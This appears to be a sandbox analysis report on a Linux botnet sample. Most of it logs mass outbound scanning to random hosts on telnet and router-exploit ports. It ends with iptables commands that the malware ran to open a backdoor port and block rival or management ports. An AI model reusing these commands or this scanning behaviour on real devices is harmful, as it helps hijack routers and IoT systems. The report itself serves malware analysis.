                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 73.9.241.254:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 177.176.214.85:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 156.167.89.28:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 211.166.254.195:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 66.218.10.63:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 139.151.132.72:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 217.50.165.81:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 75.82.144.224:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 135.140.27.106:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 212.63.97.36:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 205.162.45.253:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 213.252.178.60:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 48.56.36.74:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 71.38.218.33:2323
                            Source: global trafficTCP traffic: 192.168.2.20:33868 -> 146.244.33.196:8080
                            Source: global trafficTCP traffic: 192.168.2.20:57874 -> 131.7.179.240:8080
                            Source: global trafficTCP traffic: 192.168.2.20:54196 -> 41.64.118.236:8080
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 188.176.86.229:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 212.167.165.252:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 122.243.242.25:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 111.0.125.36:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 185.50.62.97:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 59.172.13.97:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 188.200.140.122:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 115.42.52.37:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 183.16.231.232:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 206.17.179.29:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 112.254.112.252:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 174.47.48.224:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 66.178.106.107:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 88.38.36.48:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 207.253.148.221:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 63.43.183.132:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 76.81.222.62:2323
                            Source: global trafficTCP traffic: 192.168.2.20:35476 -> 220.165.204.143:8080
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 158.101.147.68:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 36.47.126.190:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 163.68.243.17:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 87.254.248.72:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 104.46.233.185:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 38.8.33.243:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 75.210.106.74:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 202.213.251.249:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 190.178.70.246:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 135.158.105.90:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 193.73.223.232:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 119.91.55.78:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 186.19.26.160:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 95.196.154.222:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 197.185.25.16:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 202.65.105.27:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 32.153.134.237:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 193.238.117.21:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 89.27.104.84:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 135.175.116.15:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 53.252.135.112:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 148.42.51.67:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 220.187.21.100:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 75.196.238.210:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 88.220.144.120:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 36.139.136.230:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 86.106.153.130:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 187.196.99.229:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 121.130.64.26:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 101.183.25.205:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 53.164.22.0:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 110.62.230.0:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 133.137.4.253:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 183.168.194.168:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 32.243.64.41:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 126.3.149.148:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 163.166.58.36:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 24.240.185.140:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 61.199.114.26:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 20.211.166.14:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 27.207.136.28:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 120.34.226.148:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 61.61.71.43:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 82.89.10.174:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 141.34.29.8:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 19.224.224.230:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 13.185.66.112:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 168.75.205.4:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 173.115.134.194:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 213.125.161.32:2323
                            Source: global trafficTCP traffic: 192.168.2.20:35492 -> 5.187.144.78:7574
                            Source: global trafficTCP traffic: 192.168.2.20:37100 -> 190.206.177.195:7574
                            Source: global trafficTCP traffic: 192.168.2.20:58838 -> 60.182.4.178:49152
                            Source: global trafficTCP traffic: 192.168.2.20:36900 -> 34.226.216.9:52869
                            Source: global trafficTCP traffic: 192.168.2.20:54874 -> 45.66.168.229:81
                            Source: global trafficTCP traffic: 192.168.2.20:49722 -> 148.119.94.202:8080
                            Source: global trafficTCP traffic: 192.168.2.20:60760 -> 124.100.92.68:8080
                            Source: global trafficTCP traffic: 192.168.2.20:47312 -> 168.144.37.63:7574
                            Source: global trafficTCP traffic: 192.168.2.20:55472 -> 31.65.174.196:8080
                            Source: global trafficTCP traffic: 192.168.2.20:59848 -> 179.86.197.224:8443
                            Source: global trafficTCP traffic: 192.168.2.20:55356 -> 79.74.222.218:8080
                            Source: global trafficTCP traffic: 192.168.2.20:35232 -> 12.118.224.5:8080
                            Source: global trafficTCP traffic: 192.168.2.20:49328 -> 194.139.111.238:8080
                            Source: global trafficTCP traffic: 192.168.2.20:41840 -> 26.34.213.157:49152
                            Source: global trafficTCP traffic: 192.168.2.20:36462 -> 161.230.34.156:37215
                            Source: global trafficTCP traffic: 192.168.2.20:37816 -> 37.98.108.113:81
                            Source: global trafficTCP traffic: 192.168.2.20:39546 -> 158.143.122.210:52869
                            Source: global trafficTCP traffic: 192.168.2.20:40436 -> 193.36.5.127:49152
                            Source: global trafficTCP traffic: 192.168.2.20:33418 -> 31.20.82.249:8080
                            Source: global trafficTCP traffic: 192.168.2.20:35740 -> 161.127.238.198:81
                            Source: global trafficTCP traffic: 192.168.2.20:50382 -> 136.113.197.35:8443
                            Source: global trafficTCP traffic: 192.168.2.20:48226 -> 83.41.228.148:8443
                            Source: global trafficTCP traffic: 192.168.2.20:41260 -> 37.126.224.143:52869
                            Source: global trafficTCP traffic: 192.168.2.20:53138 -> 101.227.190.33:5555
                            Source: global trafficTCP traffic: 192.168.2.20:48044 -> 111.240.142.16:7574
                            Source: global trafficTCP traffic: 192.168.2.20:55242 -> 158.38.176.82:8080
                            Source: global trafficTCP traffic: 192.168.2.20:58760 -> 140.134.218.225:8080
                            Source: global trafficTCP traffic: 192.168.2.20:49084 -> 184.61.35.161:5555
                            Source: global trafficTCP traffic: 192.168.2.20:51112 -> 116.25.201.150:8080
                            Source: global trafficTCP traffic: 192.168.2.20:59970 -> 196.198.124.215:8443
                            Source: global trafficTCP traffic: 192.168.2.20:50028 -> 52.16.235.82:8080
                            Source: global trafficTCP traffic: 192.168.2.20:42628 -> 58.30.72.177:49152
                            Source: global trafficTCP traffic: 192.168.2.20:35864 -> 173.110.61.196:7574
                            Source: global trafficTCP traffic: 192.168.2.20:59006 -> 135.4.185.97:8080
                            Source: global trafficTCP traffic: 192.168.2.20:38830 -> 143.147.160.1:81
                            Source: global trafficTCP traffic: 192.168.2.20:44456 -> 94.135.178.87:81
                            Source: global trafficTCP traffic: 192.168.2.20:58872 -> 72.99.199.177:49152
                            Source: global trafficTCP traffic: 192.168.2.20:58790 -> 151.74.246.170:81
                            Source: global trafficTCP traffic: 192.168.2.20:55876 -> 78.175.116.20:52869
                            Source: global trafficTCP traffic: 192.168.2.20:36794 -> 202.81.140.0:81
                            Source: global trafficTCP traffic: 192.168.2.20:60620 -> 53.134.248.119:52869
                            Source: global trafficTCP traffic: 192.168.2.20:55554 -> 26.147.179.51:52869
                            Source: global trafficTCP traffic: 192.168.2.20:54754 -> 176.102.246.130:5555
                            Source: global trafficTCP traffic: 192.168.2.20:39122 -> 56.151.171.111:8080
                            Source: global trafficTCP traffic: 192.168.2.20:48678 -> 113.254.69.147:7574
                            Source: global trafficTCP traffic: 192.168.2.20:48330 -> 206.27.21.74:5555
                            Source: global trafficTCP traffic: 192.168.2.20:48038 -> 39.252.230.232:8443
                            Source: global trafficTCP traffic: 192.168.2.20:55860 -> 190.71.92.106:49152
                            Source: global trafficTCP traffic: 192.168.2.20:43970 -> 149.145.117.99:5555
                            Source: global trafficTCP traffic: 192.168.2.20:46000 -> 44.188.108.249:8443
                            Source: global trafficTCP traffic: 192.168.2.20:60688 -> 8.132.20.149:8443
                            Source: global trafficTCP traffic: 192.168.2.20:35494 -> 74.119.4.125:8443
                            Source: global trafficTCP traffic: 192.168.2.20:42656 -> 22.158.74.158:5555
                            Source: global trafficTCP traffic: 192.168.2.20:35660 -> 216.40.146.138:8080
                            Source: global trafficTCP traffic: 192.168.2.20:58458 -> 126.239.116.72:8080
                            Source: global trafficTCP traffic: 192.168.2.20:33462 -> 208.33.128.23:8080
                            Source: global trafficTCP traffic: 192.168.2.20:54130 -> 222.204.252.34:5555
                            Source: global trafficTCP traffic: 192.168.2.20:51074 -> 44.141.251.112:49152
                            Source: global trafficTCP traffic: 192.168.2.20:59086 -> 155.192.173.3:49152
                            Source: global trafficTCP traffic: 192.168.2.20:50826 -> 92.82.252.190:5555
                            Source: global trafficTCP traffic: 192.168.2.20:46708 -> 34.144.238.160:8080
                            Source: global trafficTCP traffic: 192.168.2.20:46958 -> 98.137.65.157:52869
                            Source: global trafficTCP traffic: 192.168.2.20:60756 -> 72.89.219.141:8443
                            Source: global trafficTCP traffic: 192.168.2.20:36870 -> 216.127.243.47:8080
                            Source: global trafficTCP traffic: 192.168.2.20:41072 -> 180.119.171.72:5555
                            Source: global trafficTCP traffic: 192.168.2.20:51280 -> 173.235.230.238:8443
                            Source: global trafficTCP traffic: 192.168.2.20:47058 -> 207.230.142.20:8080
                            Source: global trafficTCP traffic: 192.168.2.20:37854 -> 140.64.139.164:8080
                            Source: global trafficTCP traffic: 192.168.2.20:55376 -> 51.170.75.171:37215
                            Source: global trafficTCP traffic: 192.168.2.20:45412 -> 200.164.44.27:37215
                            Source: global trafficTCP traffic: 192.168.2.20:48688 -> 51.238.146.201:81
                            Source: global trafficTCP traffic: 192.168.2.20:53756 -> 180.176.10.237:81
                            Source: global trafficTCP traffic: 192.168.2.20:38876 -> 73.43.76.24:5555
                            Source: global trafficTCP traffic: 192.168.2.20:34170 -> 85.61.49.109:8080
                            Source: global trafficTCP traffic: 192.168.2.20:58048 -> 19.79.231.29:8080
                            Source: global trafficTCP traffic: 192.168.2.20:40964 -> 70.113.63.226:8443
                            Source: global trafficTCP traffic: 192.168.2.20:52226 -> 211.44.209.80:8443
                            Source: global trafficTCP traffic: 192.168.2.20:49224 -> 157.5.200.51:7574
                            Source: global trafficTCP traffic: 192.168.2.20:56926 -> 56.179.20.91:49152
                            Source: global trafficTCP traffic: 192.168.2.20:37358 -> 75.244.195.175:8080
                            Source: global trafficTCP traffic: 192.168.2.20:42222 -> 71.113.61.118:49152
                            Source: global trafficTCP traffic: 192.168.2.20:36356 -> 96.105.199.49:7574
                            Source: global trafficTCP traffic: 192.168.2.20:48666 -> 219.171.175.178:49152
                            Source: global trafficTCP traffic: 192.168.2.20:48680 -> 152.77.109.165:81
                            Source: global trafficTCP traffic: 192.168.2.20:49400 -> 120.3.130.253:8443
                            Source: global trafficTCP traffic: 192.168.2.20:38714 -> 222.35.115.231:52869
                            Source: global trafficTCP traffic: 192.168.2.20:48808 -> 29.191.42.58:8080
                            Source: global trafficTCP traffic: 192.168.2.20:60036 -> 93.26.114.163:8080
                            Source: global trafficTCP traffic: 192.168.2.20:48434 -> 43.76.242.175:8080
                            Source: global trafficTCP traffic: 192.168.2.20:36502 -> 23.165.91.76:5555
                            Source: global trafficTCP traffic: 192.168.2.20:58162 -> 42.4.201.2:52869
                            Source: global trafficTCP traffic: 192.168.2.20:53462 -> 167.243.21.26:7574
                            Source: global trafficTCP traffic: 192.168.2.20:40934 -> 166.71.33.66:37215
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 126.173.187.250:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 212.251.42.151:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 54.26.235.219:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 115.36.198.11:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 163.136.89.118:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 106.43.189.61:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 39.236.0.254:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 209.120.183.182:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 184.238.11.237:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 9.151.116.206:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 124.181.145.82:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 182.106.163.140:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 90.179.152.71:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 77.253.34.142:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 106.160.177.38:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 83.190.188.81:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 12.199.143.201:2323
                            Source: global trafficTCP traffic: 192.168.2.20:32920 -> 97.191.181.246:52869
                            Source: global trafficTCP traffic: 192.168.2.20:35860 -> 67.159.181.184:8080
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 206.165.72.172:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 125.35.75.60:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 187.155.226.130:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 178.123.15.193:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 217.205.168.132:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 101.177.86.6:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 59.66.159.74:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 70.40.129.75:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 178.88.210.245:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 213.48.178.169:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 195.49.212.151:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 27.204.236.161:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 206.39.31.252:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 198.8.107.227:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 114.219.83.119:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 164.147.110.159:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 209.143.229.253:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 104.164.201.197:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 38.155.199.107:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 46.120.23.248:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 182.223.61.33:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 8.198.203.74:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 213.120.220.137:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 193.120.5.123:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 87.78.13.108:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 140.231.227.195:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 170.134.88.147:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 185.120.151.60:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 93.102.109.79:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 190.215.114.237:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 207.17.7.126:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 116.72.59.199:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 76.123.98.28:2323
                            Source: global trafficTCP traffic: 192.168.2.20:53474 -> 190.126.252.140:52869
                            Source: global trafficTCP traffic: 192.168.2.20:49638 -> 118.144.15.19:37215
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 179.67.151.112:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 72.214.7.65:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 71.199.207.110:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 191.185.159.193:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 57.124.145.13:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 145.200.155.76:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 34.110.165.234:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 67.241.120.56:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 2.254.169.42:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 145.25.76.245:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 209.162.247.31:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 44.185.101.89:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 189.147.158.128:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 109.181.142.240:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 17.233.5.252:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 36.185.136.86:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 103.115.64.224:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 65.74.248.65:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 119.84.157.150:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 166.102.52.220:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 156.151.56.37:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 9.208.247.147:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 149.52.37.158:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 141.199.106.142:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 176.146.163.79:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 91.191.81.144:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 213.102.196.97:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 102.201.117.82:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 97.107.48.173:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 189.51.27.16:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 188.130.4.252:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 160.94.210.98:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 46.204.100.29:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 87.112.133.194:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 2.95.37.31:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 183.104.203.213:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 123.222.206.245:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 167.76.204.52:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 57.27.248.252:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 36.66.112.200:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 212.89.141.221:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 135.192.171.157:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 23.178.112.227:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 122.83.37.215:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 93.198.168.33:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 83.169.254.83:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 197.49.14.136:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 151.227.168.124:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 68.23.39.237:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 122.145.165.234:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 110.142.83.223:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 196.158.255.105:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 112.102.181.25:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 78.178.152.141:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 123.180.27.243:2323
                            Source: /tmp/bin.sh (PID: 6815)Socket: 0.0.0.0::47453
                            Source: /bin/sh (PID: 6827)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6857)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6863)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6897)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6913)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6935)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6948)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6973)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6992)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                            Source: /bin/sh (PID: 6995)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                            Source: /bin/sh (PID: 6998)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                            Source: /bin/sh (PID: 7010)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                            Source: /bin/sh (PID: 7067)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                            Source: /bin/sh (PID: 7093)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                            Source: /bin/sh (PID: 7122)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                            Source: /bin/sh (PID: 7145)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                            Source: /bin/sh (PID: 7163)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                            Source: /bin/sh (PID: 7179)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                            Source: /bin/sh (PID: 7200)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                            Source: /bin/sh (PID: 7216)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                            Source: /bin/sh (PID: 7230)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                            Source: /bin/sh (PID: 7248)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                            Source: /bin/sh (PID: 7261)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                            Source: /bin/sh (PID: 7290)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                            Source: /bin/sh (PID: 7316)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7319)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7327)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7351)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7378)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7405)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7426)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7439)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT
